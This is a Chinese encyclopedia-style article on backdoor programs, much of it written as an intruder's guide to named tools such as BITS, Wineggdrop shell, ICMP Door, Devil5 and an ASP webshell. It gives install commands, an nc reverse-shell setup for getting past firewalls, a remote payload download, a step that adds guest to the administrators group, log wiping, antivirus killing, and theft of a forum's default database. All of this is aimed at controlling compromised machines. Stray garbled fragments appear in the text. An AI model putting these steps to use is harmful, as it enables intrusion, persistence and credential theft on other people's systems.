後門程序

後門程序就是留在計算機系統中，供某位特殊使用者通過某種特殊方式控制計算機系統的途徑。 ^[1] 

後門程序，跟我們通常所説的"木馬"有聯繫也有區別。聯繫在於：都是隱藏在用户系統中向外發送信息,而且本身具有一定權限,以便遠程機器對本機的控制。區別在於：木馬是一個完整的軟件,而後門則體積較小且功能都很單一。後門程序類似於特洛依木馬（簡稱"木馬"），其用途在於潛伏在電腦中，從事蒐集信息或便於黑客進入的動作。

後門程序和電腦病毒最大的差別，在於後門程序不一定有自我複製的動作，也就是後門程序不一定會“感染”其它電腦。

後門是一種登錄系統的方法，它不僅繞過系統已有的安全設置，而且還能挫敗系統上各種增強的安全設置。

而且,在病毒命名中，後門一般帶有backdoor字樣，而木馬一般則是Trojan字樣。

後門包括從簡單到奇特，有很多的類型。簡單的後門可能只是建立一個新的賬號，或者接管一個很少使用的賬號;複雜的後門(包括木馬)可能會繞過系統的安全認證而對系統有安全存取權。例如一個login程序，當你輸入特定的密碼時，你就能以管理員的權限來存取系統。

後門能相互關聯，而且這個 技術被許多黑客所使用。例如，黑客可能使用密碼破解一個或多個賬號密碼，黑客可能會建立一個或多個賬號。一個黑客可以存取這個系統，黑客可能使用一些 技術或利用系統的某個漏洞來提升權限。黑客可能會對系統的配置文件進行小部分的修改，以降低系統的防衞性能。也可能會安裝一個木馬程序，使系統打開一個安全漏洞，以利於黑客完全掌握系統。

後門可以按照很多方式來分類，標準不同自然分類就不同，為了便於大家理解，我們從技術方面來考慮後門程序的分類方法：

此類後門程序一般都是服務器上正常 的web服務來構造自己的連接方式，比如非常流行的ASP、cgi腳本後門等。

網頁後門，網絡上針對系統漏洞的攻擊事件漸漸少了，因為大家在認識到網絡安全的重要性之後，最簡單卻又最有效的防護辦法：升級，都被大家所認同，所以系統漏洞在以後的歲月中存活的週期會越來越短，而從最近的趨勢來看，腳本漏洞已經漸漸取代了系統漏洞的地位，非常多的人開始研究起腳本漏洞來，sql注入也開始成為各大安全站點首要關注熱點，找到提升權限的突破口，進而拿到服務器的系統權限。

asp、CGI、PHP這三個腳本大類在網絡上的普遍運用帶來了腳本後門在這三方面的發展。

線程插入後門

利用系統自身的某個服務或者線程，將後門程序插入到其中，具體原理原來《黑客防線》曾具體講解過，感興趣的朋友可以查閲。這也是最流行的一個後門技術。

擴展後門

所謂的“擴展”，是指在功能上有大的提升，比普通的單一功能的後門有很強的使用性，這種後門本身就相當於一個小的安全工具包，能實現非常多的常見安全功能，適合新手使用————但是，功能越強，個人覺得反而脱離了後門“隱蔽”的初衷，具體看法就看各位使用者的喜好了。

c/s後門

和傳統的木馬程序類似的控制方法，採用“客户端/服務端”的控制方式，通過某種特定的訪問方式來啓動後門進而控制服務器。

這個需要單獨説明，其實把它單獨列一個類在這裏是不太恰當的，但是，root kit的出現大大改變了後門程序的思維角度和使用理念，可以説一個好的root kit就是一個完全的系統殺手!後文我們講涉及到這方面，一定不會讓大家失望!

上面是按照技術做的分類，除了這些方面，正向連接後門、反向連接後門等分類也是很常見的，其實如何分類是編程者考慮的事，廣大的使用者就不用考慮那麼多了，我們看重的，只是功能!

首先我們來簡單解釋一下什麼是典型的"線程插入"後門:這種後門在運行時沒有進程,所有網絡操作均播入到其他應用程序的進程中完成。也就是説，即使受控制端安裝的防火牆擁有“應用程序訪問權限”的功能，也不能對這樣的後門進行有效的警告和攔截，也就使對方的防火牆形同虛設了!因為對它的查殺比較困難，這種後門本身的功能比較強大，是“居中家旅行、入侵攻擊”的必備品哦! ^[2] 

這類的典範就是國內提倡網絡共享的小榕的BITS了，從它的推出以來，各類安全工具下載園地裏BITS就高居榜首，非常多的朋友使用它的過程中感到了方便。類型：系統後門

使用範圍：wind200/xp/2003

隱蔽程序：★★★★☆

使用難度：★★★☆☆

查殺難度：★★★★☆

BITS其實是Background Intelligent Transfer Servicer的縮寫，可以在不知不覺中實現另一種意義的典型的線程插入後門，有以下特點：進程管理器中看不到;平時沒有端口，只是在系統中充當卧底的角色;提供正向連接和反向連接兩種功能;僅適合用於windows 200/xp/2003。

運用舉例

首先我們用3389登錄上肉雞，確定你有SYSTEM的權限，將BITS.DLL拷貝到服務器上，執行CMD命令： 4 #R Br A

rundll32.exebits.dll,install

這樣就激活了BIST，程序用這個特徵的字符來辨認使用者，也就相當於你的密碼了，然後卸載：rundll32.exe BITS.dll,Uninstall

這是最簡單的使用，這個後門除了隱蔽性好外，還有兩大特點是非常 值得借鑑的：端口複用和正反向連接。雖然很多朋友經常聽到這兩個名詞，但並不瞭解它們，端口複用就是利用系統正常的TCP端口通訊和控制，比如80、139等，這樣的後門有個非常 大的好處就是非常 隱蔽，不用自己開端口也不會暴露自己的訪問，因為通訊本身就是系統的正常訪問!另一個是反向連接，這個很常 見，也是後門中一個經典思路，因為從服務器上主動方問外邊是不被禁止的，很多很厲害的防火牆就怕這點!

BITS的正向連接很簡單，大家可以參考它的README，這種方式在服務器沒有防火牆等措施的時候很管用，可以方便地連接，但是遇到有防火牆這樣的方式就不靈了，得使用下面的反向連接方式： 70 +g3l

在本地使用NC監聽(如：nc -l -p 1234)

用NC連接目標主機的任何一個防火牆允許的TCP端口(80/139/445……)

輸入激活命令：[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email] ^q/hQ , 4

目標主機的CMD將會出現NC監聽的端口2222，這樣就實現了繞過防火牆的功能了。

所謂的擴展後門，在普通意義上理解，可以看成是將非常多的功能集成到了後門裏，讓後門本身就可以實現很多功能，方便直接控制肉雞或者服務器，這類的後門非常受初學者的喜愛，通常集成了文件上傳/下載、系統用户檢測、HTTP訪問、終端安裝、端口開放、啓動/停止服務等功能，本身就是個小的工具包，功能強大。 ^[1] 

Wineggdroup shell j;類型：系統後門

使用範圍：win2000/xp/2003

隱蔽程度：★★★★☆

使用難度：★★☆☆☆

危害程度：★★★★☆

查殺難度：★★★★☆

這個後門是擴展後門中很有代表性的一個，功能這全面讓人歎為觀止，它能實現如下比較有特色的功能：進程管理，可查看，殺進程(支持用進程名或PID來殺進程);註冊表管現(查看，刪除，增加等功能);服務管理(停止，啓動，枚舉，配置，刪除服務等功能)端口到程序關聯功能(fport);系統重啓，關電源，註銷等功能(reboot,poweroff,shutdown,logoff);嗅探密碼功能;安裝終端，修改終端端口功能;端口重定向功能(多線程，並且可限制連接者IP);HTTP服務功能(多線程，並且可限制連接者IP);Socd5代理功能(支持兩種不同方式驗證，可限制連接者IP);克隆賬號，檢測克隆賬户功能(clone,checkclone);加強了的FindpassWord功能(可以得到所有登錄用户，包括使用克隆賬户遠程登錄用户密碼);HTTP代理(完全匿名，支持oicq、 MSN、mirc等程序);其他輔助功能，http下載，刪除日誌，系統信息，恢復常用關聯，枚舉系統賬户等。

當網絡上剛推出這個後門的時候，非常多的人用它來替換自己原來使用的後門，一時間各處讚揚之聲迭起，但多為一些普通的打撈手的心聲，其實它和“後門”的原始定義是有出入的：一旦你需要實現越多的功能，那你的程序在執行、隱藏、穩定等方面就需要考慮非常多的問題，一個疏忽就會導致全盤皆敗，所以不建議將此後門用在需要非常隱蔽的地方。

在安裝後門前，需要使用它自帶的EditServer.exe程序對服務端進行非常詳細的配置，從10個具體配置中，包括了插入線程、密碼、IP登錄郵件通告等方面，不難看出它的功能是非常強大的，隱蔽性也很強，下面説幾個在入侵中常用的功能，相信經常玩入侵的朋友一定能發現它的強大之處： ^[2] 

Fport:列出進程到端口的列表，用於發現系統中運行程序所對應的端口，可以用來檢測常見的隱蔽的後門。

Reboot:重啓系統，如果你上傳並運行了其他後門程序，並需要重啓機器以便讓後門正常工作，那使用這個命令吧! Uz

Shell:得到一個Dos Shell,這個不多講了，直接得到服務器或者肉雞上的cmd shell。

Pskill PID或程序名：用於殺掉特定的服務，比如殺毒軟件或者是防火牆。

Execute程序：在後台中執行程序，比如sniffer等。http://ip/文件名 保存文件名：下載程序，直接從網上down一個後門到服務器上。

Installterm端口：在沒有安裝終端服務的win2k服務版的系統中安裝終端服務，重啓系統後才生效，並可以自定義連接端口，比如不用3389而用其他端口。

StopService/StartService:停止或者啓動某個系統服務，比如telnet。

CleanEvent:刪除系統日誌。

Redirect:TCP數據轉發，這個功能是後門程序中非常出色的一個功能，可以通過某一端口的數據轉發來控制內網的機器，在滲透入侵的時候非常管用!

EnumService:列舉所有自動啓動的服務的資料，比如後門、木馬。

RegEdit:進入註冊表操作模式，熟悉註冊表的使用者終於在後門中找到了福音! !

Findpassword:得到所有登錄用户密碼，比我們常用的findpass功能可強多了。

總體來講，Wineggdrop shell是後門程序中很出彩的一個，它經過作者幾次大規模的修改和升級，已經趨於穩定，功能的強大當然沒得説，但是由於功能太強大，被查殺和懷疑是難以避免的，所以很多人在使用Wineggdrop shell一段時間後就發現肉雞飛了，其實是很正常的事，我你出不用氣餒，其實用很簡單的方法就可以很好地提高它的隱蔽性，下文將有説明。

相對於Wineggdrop shell來説，獨孤劍客的winshell在功能上就不那麼全面了，但是筆者推薦新手更多的使用winshell而不是Wineggdrop shell，因為winshell功能除了獲得一個shell以外，只加入了一些重啓、關閉服務器的命令，功能相對簡單，但完全使用系統自帶的cmd來執行命令，對系統學習和掌握也是非常有幫助的!

Winshell和wolf這兩者都是國內早期頂尖的後門程序，程序的編制無疑是非常經典的，新手學習時使用這兩款後門一定能讓你明白很多系統相關東西，瞭解很多入侵思路和方法。

傳統的木馬程序常常使用C/S構架，這樣的構架很方便控制，也在一定程度上避免了“萬能密碼”的情況出現，對後門私有化有一定的貢獻，這方面分類比較模糊，很多後門可以歸結到此類中，比如較巧妙的就是ICMP Door了

類型：系統後門

使用範圍：win2000/xp/2003 2Z6

隱蔽程度：★★★★★

使用難度：★★★☆☆

危害程度：★★★★☆

查殺難度：★★★★★

這個後門利用ICMP通道進行通信，所以不開任何端口，只是利用系統本身的ICMP包進行控制安裝成系統服務後，開機自動運行，可以穿透很多防火牆——很明顯可以看出它的最大特點：不開任何端口~只通過ICMP控制!和上面任何一款後門程序相比，它的控制方式是很特殊的，連80端口都不用開放，不得不佩服務程序編制都在這方面獨特的思維角度和眼光!

運用舉例

這個後門其實用途最廣的地方在於突破網關後對內網計算機的控制，因為很多機密數據都是放在內網計算機上的，而控制內網計算機並不是我們想到位的商業網絡進行入侵檢測，它的網絡內部並不像我們常見的內網那樣非常容易入侵和控制，因為該公司本身涉及到一些網絡安全的服務，所以內網個人計算機的防護是很到位的，在嘗試過很多後門後，最後ICMP Door幫我實現了成功的滲透內網!由此筆者開始愛上這個後門。

首先使用icmpsrv.exe -install參數進行後門的安裝，再使用icmpsend.exe IP進行控制，可以用：[http://xxx.xxx.xxx/admin.exe-hkfx.exe]方式下載文件，保存在[url=file://\\system32\]\\system32\[/url]目錄下，文件名為hkfx.exe，程序名前的“-”不能省去，使用[pslist]還可以列出遠程主機的進程名稱和pid，再使用[pskill id]就可以殺進程了，同樣，輸入普通cmd命令，則遠程主機也就執行了相關的命令。 ~HF1 ? %

這個後門是採用的c/s構架，必須要使用icmpsend才能激活服務器，但是他也有自己的先天不足：後門依靠ICMP進行通訊，經過沖擊波的洗禮後，很少有服務器還接受ICMP包了，很多都屏蔽掉了它，所以用它來控制服務器不是一個好辦法，這也是我為什麼用它來控制內網計算機的原因了——內網很少有人屏蔽ICMP包吧?

賬號後門技術是指黑客為了長期控制目標計算機，通過後門在目標計算機中建立一個備用管理員賬户的技術。一般採用克隆賬户技術。克隆賬户一般有兩種方式，一個是手動克隆賬户，一個是使用克隆工具。 ^[1] 

這是ASP腳本方面流傳非常廣的一個腳本後門了，在經過幾次大的改革後，推出了“海陽頂端ASP木馬XP版”、“海陽頂端ASP木馬紅粉佳人版”等功能強大、使用方便的後門，想必經常接觸腳本安全的朋友對這些都不會陌生。類型：網頁木馬

使用範圍：支持ASP、WEB訪問

使用難度：★☆☆☆☆

危害程序：★★★☆☆

查殺難度：★★★☆☆

服務器系統配置都相對安全，公開的系統漏洞存在的機會很少，於是腳本方面的漏洞就開始火起來。首先我們通過某種途徑獲得一個服務器的頁面權限(比如利用論壇上傳達室類型未嚴格設置、SQL注入後獲得ASP系統的上傳權限、對已知物理路徑的服務器上傳特定程序)，然後我們可以通過簡單的上傳ASP程序或者是直接複製海陽項端的代碼，然後通過WEB訪問這個程序，就能很方便地查閲服務器上的資料了，下面舉個簡單的便子(由於只是簡單的介紹，下文便子不會太難或者太普遍，希望大家理解)。

leadbbs2.77曾經風靡網絡，它是個很典型的ASP論壇，屏蔽了很多可以SQL注入的寺方，但是很多傻瓜級別的網絡管理員總是喜歡默認安裝，然後啓用論壇，我們只需要很簡單地在IE中輸入：WWW。***。COM/BBS/DATA/LEADBBS。MDB就能夠直接下載該論壇的數據庫了，而且沒有MD5加密哦!，我們直接找到管理員的賬户和密碼，然後登錄論壇，到管理界面將論壇的“聯繫我們”、“幫助”等ASP文件替換成我們的海陽項端代碼，然後執行GUEST權限的CMD命令，方便的上傳/下載將定程序、遠程執行程序等，這樣一個隱藏的後門就建好了!取得服務器的SYSTEM權限就看大家自己的辦法了。

一般來講，海洋的功能是非常強大的，而且不容易被查殺(一個朋友採取的方式是：先利用某個腳本漏洞上傳網頁後門，再通過海洋上傳另一個後門到隱蔽的路徑，然後通過最後上傳的後門來刪除第一次上傳的海洋，這樣後門的存放路徑就可以放得非常深了，普通管理員是很難發現的)，如果管理員覺得自己可能中了這裏邊樣的後門，可以利用論壇備份來恢復自己的頁面系統，再配合系統日誌、論壇日誌等程序檢查系統，發現可疑ASP文件打開看看海洋是很好識別的，再刪除就可以了。

腳本方面的後門還有CGI和PHP兩面三刀大類，使用原理都差不多，這裏就不再多介紹，在黑防論壇也收錄了這三種後門，大家可以下載後自己研究。

類型：系統後門

使用範圍：win200/xp/2003

隱蔽程度：★★★★☆

使用難度：★★☆☆☆

危害程序：★★★★☆

查殺難度：★★★☆☆

同BITS一樣，Devil5也是線程插入式的後門，和BITS不同的是它可以很方便的在GUI界面下按照自己的使用習慣定製端口和需要插入的線程，適合對系統有一定了解的使用都使用，由於是自定義插入線程，所以它更難被查殺，下面我們來看看它的使用。

道德使用它自帶的配置程序EDITDEVIL5.EXE對後門進行常規的配置,包括控制端口、插入線程、連接密碼、時間間隔等方面關鍵點是對插入線程的定製，一般設置成系統自帶的SVCHOST，然後運行後門就可以控制了。

我們用TELNET連接上去，連接的格式是：TELNET *** 定製的端口，它和其他後門不同之處在於連接後沒有提示的界面，每次執行程序也是分開的，必須要每次都有輸入密碼，比如我們丟掉了服務器和管賬户，可以激活GUEST後再將GUEST加到管理員權限，記得每次執行命令後加上“>密碼”就可以了：net localgroup administrators guest /add >hkfx，然後你又可以控制服務器了。

很明顯示，同榕哥的BITS相比，DEVIL5有一些缺陷：不能通過系統自帶端口通訊、執行命令比較麻煩，需要每次輸入密碼而且不回顯示輸入內容，很容易出錯。但是，它有自己的優勢：插入線程可以自已定製，比如設置IE的線程為插入的目標就比較難被查殺：自己提供了專門的查殺工具DELDEVIL5.exe，幫助防護者清理系統;而且它可以任意改名和綁定，使用靈活性上比BITS強……大家選擇哪能款就看自己的喜好了。

另外，PortLess BackDoor等工具也是此類的後門，功能強大，隱蔽性稍差，大家有興趣可以自己研究一下。

如果説上面的後門程序都各有千秋、各有所長的話，它們和經典的root kit 一比簡直就是小巫見大巫了，那究竟什麼樣是root kit呢?

root kit出現於20世紀90年代初，在1994年2月的一篇安全諮詢報告中首先使用了root kit這個名詞。從出現至今，root kit 的技術發展非常迅速，應用越來越廣泛，檢測難度也越來越大。其中釷對SunOS和Linux兩種操作系統的root kit最多。

很多人有一個誤解，他們認為root kit 是用作獲得系統root訪問權限的工具。實際上，root kit是攻擊都用來隱蔽自己的蹤跡和保留root訪問權限的工具。通常，攻擊者通過遠程攻擊獲得root訪問權限，進入系統後，攻擊者會在侵入的主機中安裝root kit，然後他將經常通過root kit的後門檢查系統是否有其他的用户登錄，如果只有自己，攻擊者就開始着手清理日誌中的有關信息。通過root kit的嗅探器獲得其他系統的用户和密碼之後，攻擊者就會利用這些信息侵入其他系統。

從*nix系統上遷移到windows系統下的root kit完全沿襲了這些“可怕”的功能!網絡上常見的root kit 是內核級後門軟件，用户可以通過它隱藏文件、進程、系統服、系統驅動、註冊表鍵和鍵值、打開的端口以及虛構可用磁盤窨。程序同時也在內存中偽裝它所做的改動，並且隱身地控制被隱藏進程。程序安裝隱藏後門，註冊隱藏系統服務並且安裝系統驅動。該後門技術允許植入reDirector，是非常難以查殺的一個東東，讓很多網絡管員非常頭疼!

最著名的後門程序，該算是微軟的Windows Update了。Windows Update的動作不外乎以下三個：開機時自動連上微軟的網站，將電腦的現況報告給網站以進行處理，網站通過Windows Update程序通知使用者是否有必須更新的文件，以及如何更新。如果我們針對這些動作進行分析，則“開機時自動連上微軟網站”的動作就是後門程序特性中的“潛伏”，而“將電腦現況報告”的動作是“蒐集信息”。因此，雖然微軟“信誓旦旦”地説它不會蒐集個人電腦中的信息，但如果我們從Windows Update來進行分析的話，就會發現它必須蒐集個人電腦的信息才能進行操作，所差者只是蒐集了哪些信息而已。